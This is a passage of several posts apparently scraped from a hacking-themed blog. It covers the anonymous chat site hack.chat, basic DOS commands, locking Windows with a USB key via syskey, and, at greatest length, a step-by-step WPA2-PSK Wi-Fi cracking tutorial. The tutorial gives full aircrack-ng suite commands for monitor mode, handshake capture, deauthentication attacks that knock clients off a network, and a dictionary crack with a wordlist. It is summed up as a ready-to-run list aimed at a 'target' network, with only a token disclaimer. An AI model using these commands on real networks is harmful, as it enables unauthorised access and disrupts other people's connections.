Creator of “hack.chat“, Andrew Belt, a student at the University of Tennessee, promises that no message history is kept on the hack.chat servers, so random channel names can be created for purely private discussions without worrying about privacy.

Enjoy with your own Hacker Style Disposable Chat Room. Chat in Private and also stay genuinely anonymous.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


Disk Operating System (DOS), is an acronym for several computer Operating Systems that were operated by using the command line. So HACKAGON collaborated A LIST OF DOS COMMANDS which will make you a better programmer.

List Of DOS Commands Hackagon

MS-DOS dominated the IBM PC compatible market between 1981 and 1995, or until about 2000 including the partially MS-DOS-based Microsoft Windows (95, 98, and Millennium Edition). “DOS” is used to describe the family of several very similar command-line systems, including MS-DOS, PC-DOS, DR-DOS, FreeDOS, ROM-DOS, OSx16, “Horizon OS” and PTS-DOS.

In spite of the common usage, none of these systems were simply named “DOS” (a name given only to an unrelated IBM mainframe operating system in the 1960s). A number of unrelated, non-x86 microcomputer disk operating systems had “DOS” in their names, and are often referred to simply as “DOS” when discussing machines that use them (e.g. AmigaDOS, AMSDOS, ANDOS, Apple DOS, Atari DOS, Commodore DOS, CSI-DOS, ProDOS, and TRSDOS). While providing many of the same operating system functions for their respective computer systems, programs running under any one of these operating systems would not run under others.

LIST OF DOS COMMANDS

First of all open command Prompt
Go to Start >> Run >> CMD

1. To create a new directory.
Command: C:\>mkdir hackagon Or C:\>md hackagon
[hackagon is your directory name]

2. To remove a directory.
Command: C:\>rmdir hackagon Or C:\>rd hackagon
[hackagon is your directory name].

3. To clear the screen.
Command: C:\>cls

4. To see the contents or subdirectory of a directory.
Command: C:\>dir Or C:\>dir /p
[“dir /p” to see the directory page by page].

Or C:\>dir /a
[“dir /a” to see all directories + hidden directories].

Or C:\>dir /ah
[“dir /ah” to see only hidden directories].

5. To change the directory.
Command: C:\>cd hackagon
[hackagon is your directory name].

C:\>cd..
[cd followed by 2 periods takes you one level up i.e to the parent directory]

C:\>cd\
[cd followed by backslash periods takes you to the top directory i.e directly under the drive]

6. To rename a directory or file.
Command: C:\>ren hackagon newhackagon
[By this command the folder hackagon will be renamed to newhackagon].

7. To move a file from one destination to another.
C:\>move <sourcepath> <destinationpath>
Command: C:\>move C:\hackagon.txt D:\
[hackagon.txt is your directory name].

8. To create a new file.
Command: C:\>copy con hackagon.txt
[Once you created the file press Enter and type the information inside the file and to save the file hold Ctrl+Z. This will return ^Z. Once this has been entered press Enter to save and exit the file.].
[hackagon.txt is your file name].

9. To see the content of a text file.
Command: C:\>type hackagon.txt
[hackagon.txt is your file name].

10. To delete a file.
Command: C:\>del hackagon.txt
[hackagon.txt is your file name].

11. To edit a file.
Command: C:\>edit hackagon.txt
[hackagon.txt is your file name].

12. To copy a file from one destination to another.
C:\>copy <sourcepath> <destinationpath>
Command: C:\>copy C:\hackagon.txt D:\
[hackagon.txt is your file name].

13. To copy a directory from one destination to another.
C:\>xcopy <sourcepath> <destinationpath> /s
Command: C:\>xcopy C:\hackagon D:\ /s
[hackagon is your directory name]

14. Exit from the command prompt.
Command: C:\>exit

Enjoy the knowledge and manipulate your computer with your own. Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


I’ve always been fascinated by the movies where a geek inserts the Pendrive into PC to log in, something like NSA mainframe style. This can also be a method to keep your confidential information confidential when you’re away from the keyboard. So learn how to Lock And Unlock Computer With Pendrive here in HACKAGON.

Lock And Unlock Computer With Pendrive Hackagon

If you prevent access to your computer with just a password, you are missing out on an alternate and more secure way to lock down your computer.

Steps To Lock And Unlock Computer With Pendrive:

STEP 1: Insert your Pendrive into your system and wait for it to be recognized.

STEP 2: Go to Start >> Control Panel >> Administrative Tools >> Computer Management >> Disk Management Or directly type diskmgmt.msc in Run.

disk management hackagon

STEP 3: Then Right-click the partition whose name you want to change (click in the white area just below the word “Volume”) and Select “Change Drive Letter and Paths…

pendrive management hackagon
From here you can re-assign the drive letter it was given to “A” (Drive letter of Pendrive must be “A”).

STEP 4: Start >> Run >> syskey.

syskey hackagon

Click on “OK

syskey window hackagon

Syskey launched: Click “Update

Startup Key Hackagon

Choose “Store Startup Key on Floppy Disk” and Click “OK

save startup key hackagon

You’ll be prompted to enter your diskette. Make sure your Pendrive is inserted and writable. Restart and have fun. Don’t lose yours Pendrive. And, to revert this, you can run syskey again and choose to store it locally instead of “On a floppy disk”.

Enjoy the trick and Stay Secure. Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


WiFi is getting so much essential as days are passing but WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase and that’s sometimes also called Dictionary Attack. So Let’s see How to Hack WPA2-PSK WiFi Password Using Linux.

Cracking WPA2 wifi password is not really an easy task to do, you can’t crack it with a mouseclick as they show in movies and there is no software that will give you the password without some hard work but you don’t worry HACKAGON can show you how to crack it with few easy steps and we will do it using aircrack-ng.

Hack WPA2-PSK WiFi Password Using Linux Hackagon

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy (WEP) was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that’s very difficult to crack—but not impossible.

The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Requirements: To Hack WPA2-PSK WiFi Password Using Linux

  1. Kali Linux or any Pentesting Linux Distros with aircrack-ng installed in it. if you don’t have aircrack-ng suite get it by this command in terminal sudo apt-get install aircrack-ng
  2. A Wireless Network Adapter that support monitor mode like Alfa 2W AWUS036NH, Alfa AWUS036H, wifiy-city 56G, or you can check this page here for card compatibility by clicking on >> Compatibility Drivers.
  3. A wordlist comprising of all the possible different combination of pass-phrases.

Let’s See How To Hack WPA2-PSK WiFi Password Using Linux

1) open up your Root Terminal as root and type ifconfig this will show you all the networking interfaces connected to your device.

ifconfig Hackagon

if your wireless network adapter is working fine you should see the “wlan0” the name may change if you have more than one connected wireless adapter.

2) Now to start monitor mode type airmon-ng start wlan0.

airmon-ng is a traffic monitoring tool.
wlan0 is your Wireless Interface.

After this command, It’ll start the monitor mode.

airmon-ng Hackagon

As it’s seen the monitor mode is working under “wlan0mon“, So this is your card name for now.

We can see there is a list of Process ID’s (PID) and that will cause trouble during the process so we’ll kill those processes by typing “kill <pid>” in my case, it is “kill 1210 1341 1591 1592“.

kill terminal command hackagon

3) To show the list of available WiFi Network Type airodump-ng wlan0mon.

airodump-ng is a WiFi Packet Capturing Tool.
wlan0mon is my Monitoring Interface.

airodump-ng Hackagon

airodump-ng will start capturing all packets.

airodump-ng captured packets hackagon

From the captured packets select your target and note its ‘BSSID‘ (BSSID = Base Service Set Identifier) and ‘Channel‘. Then stop the capture using “ctrl+c“.

4) Start capturing the packets of your target network by typing airodump-ng -c -w –bssid wlan0mon and in my case, it is airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon.

Captured WiFi Packets Hackagon

This will start capturing the packets and if you get the handshake then you won’t need the aireplay-ng command but in case if you don’t get the handshake while capturing of packets goes on, open a new terminal as root and type aireplay-ng -0 0 -a mon0.

aireplay-ng => Tool for Deauthentication, Fake Authentication, and Other Packet Injections.
-0 => Number Associated for Deauthentication.
0 => Deauth Count.
-a => bssid here we are trying to send a deauthentication request.
In my case, the command looks like aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon.

aireplay-ng deauth hackagon

After few seconds stop it using ‘Ctrl+c‘.
Now after we have successfully captured the WPA handshake it’ll look like:

WPA Handshake Hackagon

5) Stop the capture using ‘Ctrl+c‘ and type ‘ls‘ that would bring up all the current directories and files.

WiFi Captured Files Hackagon

Now, Select the file with ‘.cap‘ extension and type aircrack-ng -w
aircrack-ng=> Tool that helps in cracking the password.
In my case, the command looks like aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’.

aircrack-ng hackagon

Now it starts finding suitable passphrase.

WPA2 Passphrase Hackagon

And now all you have to do is to wait till you see the lovely news (KEY Found).

Summing Up All Step in few lines:

  1. ifconfig
  2. airmon-ng start wlan0
  3. airodump-ng wlan0mon
  4. airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon
  5. aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon
  6. aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.